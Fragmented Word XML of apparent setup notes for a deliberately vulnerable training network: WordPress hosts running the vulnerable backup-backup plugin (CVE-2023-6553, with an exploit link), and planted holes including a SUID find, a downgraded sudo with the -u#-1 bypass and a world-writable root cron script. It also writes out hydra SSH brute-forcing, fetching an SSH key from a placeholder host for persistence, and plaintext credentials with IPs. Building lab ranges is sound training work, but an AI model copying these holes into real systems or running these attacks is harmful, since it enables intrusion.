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b85lj7foqky" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Public Web Servers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Foothold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Public IP to each one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Expose port 80 or 443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a wordpress server on each one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https://ubuntu.com/tutorials/install-and-configure-wordpress#4-configure-apache-for-wordpress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MySQL user password: &lt;your-password&gt;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Wordpress.config file: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&lt;VirtualHost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*:80&gt;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ServerAdmin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webmaster@localhost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DocumentRoot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/var/www/html/wordpress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ServerName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&lt;server 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ServerAlias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www.&lt;server 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DocumentRoot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/srv/www/wordpress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&lt;Directory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/srv/www/wordpress&gt;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FollowSymLinks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AllowOverride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DirectoryIndex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index.php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&lt;/Directory&gt;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&lt;Directory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/srv/www/wordpress/wp-content&gt;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FollowSymLinks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&lt;/Directory&gt;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&lt;Directory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/srv/www/wordpress/wp-content/plugins&gt;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FollowSymLinks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Indexes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&lt;/Directory&gt;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&lt;Directory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/srv/www/wordpress/wp-content/plugins/backup-backup&gt;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FollowSymLinks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Indexes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&lt;/Directory&gt;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&lt;Directory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/srv/www/wordpress/wp-content/plugins/backup-backup/includes&gt;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FollowSymLinks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Indexes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granted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025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&lt;/Directory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026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&lt;/VirtualHost&gt;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this plugin to each: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https://downloads.wordpress.org/plugin/backup-backup.1.3.7.zip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that link to get the right version (must be 1.3.7 or older)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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPLOIT</w:t>
      </w:r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https://github.com/Chocapikk/CVE-2023-6553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Privilege Escalation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sudo chmod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u+s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/usr/bin/find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Public Server 1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Username: server1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53F&amp;8bM)ei^zQnKFrP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http://3.15.142.98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Public Server 2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http://3.131.231.237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Username: server2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&amp;N@captpumvI9we#qi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EXPLOIT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wget https://some.server/id_rsa.pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F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find id_rsa.pub -exec ... \;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do this, but with id_rsa.pub and authorized_keys file (might need chmod as well):</w:t>
      </w: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o6lchksrv7e1" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web &amp; PCs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Foothold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this subnet is not reachable from the public subnet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SSH login with the following credentials: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username: user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password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adduser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sudo systemctl restart sshd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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPLOIT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printf "root\nadmin\nuser\n" &gt; users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E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printf "root\npassword\npass\n" &gt; passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F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hydra -L users.txt -P passwords.txt ssh://[TARGET IP] # gives login credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050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ssh [USERNAME]@[TARGET IP]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Privilege Escalation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sudo su -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export SUDO_FORCE_REMOVE=yes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apt remove sudo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wget https://github.com/sudo-project/sudo/releases/download/SUDO_1_8_27/sudo_1.8.27-1_ubu1804_amd64.deb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dpkg -i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88038"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">sudo_1.8.27-1_ubu1804_amd64.deb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echo 'user ALL=(ALL,!root) /bin/bash' &gt;&gt; /etc/sudoers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Web Server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PC1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PC2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PC3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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPLOIT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-u#-1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55l9a8s7jqoa" w:id="2"/>
      <w:bookmarkEnd w:id="2"/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Foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="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Privilege Escalation</w:t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sudo su -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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/var/backup.sh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/root/backup.sh"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 /var/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A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chmod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777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/var/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B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crontab -e # add this line: * * * * * /bin/bash /var/backup.sh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o4mtauex5lly" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTP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up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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https://vitux.com/how-to-install-ntp-server-and-client-on-ubuntu/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3.131.231.237" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vitux.com/how-to-install-ntp-server-and-client-on-ubuntu/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sudo-project/sudo/releases/download/SUDO_1_8_31/sudo_1.8.31-1_ubu1804_amd64.de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3.15.142.98" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ubuntu.com/tutorials/install-and-configure-wordpress#4-configure-apache-for-wordpress" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://downloads.wordpress.org/plugin/backup-backup.1.3.7.zip" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Chocapikk/CVE-2023-655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